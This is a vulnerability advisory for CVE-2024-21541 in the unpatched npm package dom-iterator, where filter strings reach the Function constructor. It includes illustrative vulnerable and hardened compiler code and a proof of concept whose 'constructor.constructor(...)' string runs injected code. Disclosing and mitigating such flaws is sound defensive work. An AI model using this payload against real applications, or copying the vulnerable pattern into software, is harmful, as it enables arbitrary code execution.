Arbitrary Code Execution Affecting dom-iterator package, versions *
- Snyk ID SNYK-JS-DOMITERATOR-6157199
- published 12 Nov 2024
- disclosed 15 Jan 2024
- credit NodeMedic-FINE
- Introduced: 15 Jan 2024
- CVE-2024-21541

How to fix?

There is no fixed version for dom-iterator.
Overview
dom-iterator is a feature-rich, well-tested Iterator for traversing DOM nodes.

Affected versions of this package are vulnerable to Arbitrary Code Execution due to use of the Function constructor without complete input sanitization. Function generates a new function body, so care must be given to ensure that the inputs to Function are not attacker-controlled. The risks involved are similar to those of allowing attacker-controlled input to reach eval.
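Since no fixed version exists, the practical mitigation is to never let an untrusted string reach a Function-based expression compiler. The following is an added example, not dom-iterator's own code: a toy filter-expression compiler in the vulnerable style (string becomes a function body via Function) beside a hardened version that accepts only a real predicate function or a tiny allowlisted "property == literal" grammar evaluated without generating code. The node objects and function names are constructed for illustration.

```javascript
// Added example, not dom-iterator's code. The vulnerable pattern compiles a
// string "filter expression" with Function, so the string IS code; the
// hardened version evaluates an allowlisted expression without Function.

// Vulnerable pattern: the expression string becomes a function body.
function compileExprUnsafe(expr) {
  // Any JavaScript in `expr` runs here, including prototype escapes.
  return new Function('_', 'return ' + expr);
}

// Allowlist: `<identifier> <==|===|!=|!==> <'string'|integer>` and nothing else.
const SAFE_EXPR = /^([A-Za-z_]\w*)\s*(===|==|!==|!=)\s*(?:'([^'\\]*)'|(\d+))$/;

// Hardened pattern: accept a real predicate function, or parse the tiny
// allowlisted grammar and compare values directly. No code is generated.
function compileExprSafe(expr) {
  if (typeof expr === 'function') return expr;
  if (typeof expr !== 'string') throw new TypeError('expr must be a function or string');
  const m = SAFE_EXPR.exec(expr.trim());
  if (!m) throw new Error('unsupported filter expression: ' + expr);
  const prop = m[1];
  const negate = m[2].startsWith('!');
  const literal = m[3] !== undefined ? m[3] : Number(m[4]);
  return (node) => {
    // Own properties only: no prototype walk, so "constructor" never resolves.
    const has = Object.prototype.hasOwnProperty.call(node, prop);
    const equal = has && node[prop] === literal;
    return negate ? !equal : equal;
  };
}

// Apply a filter expression to a list of node-like objects.
function filterNodes(nodes, expr, compile) {
  const pred = compile(expr);
  return nodes.filter((n) => pred(n));
}

// Constructed sample "DOM": a flat list of node-like objects.
const SAMPLE_NODES = [
  { nodeType: 1, nodeName: 'H1' },
  { nodeType: 3, nodeName: '#text' },
  { nodeType: 1, nodeName: 'P' },
];

// Returns the node names matching `expr` under the hardened compiler.
function elementNames(expr) {
  return filterNodes(SAMPLE_NODES, expr, compileExprSafe).map((n) => n.nodeName);
}
```

The hardened compiler rejects anything outside the grammar, including the "constructor.constructor(...)" form used in the PoC below, while the unsafe one evaluates whatever it is given.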
PoC
Executing this code will cause the code console.log("GLOBAL.CTF HIT") to be executed, leading to the output of the string 'GLOBAL.CTF HIT' to the console.
```javascript
var PUT = require('dom-iterator');
// We want to prove we can execute this by using the package
global.CTF = function() { console.log("GLOBAL.CTF HIT") };
var parser = require('mini-html-parser');
var html = '<h1></h1>'; // Any non-empty html should work
var parser = parser(html);
var node = parser.parse();
var it = PUT(node);
var next;
// The filter expression string is compiled with Function, so it runs as code
while (next = it.next("constructor.constructor('global.CTF()')()")) { }
```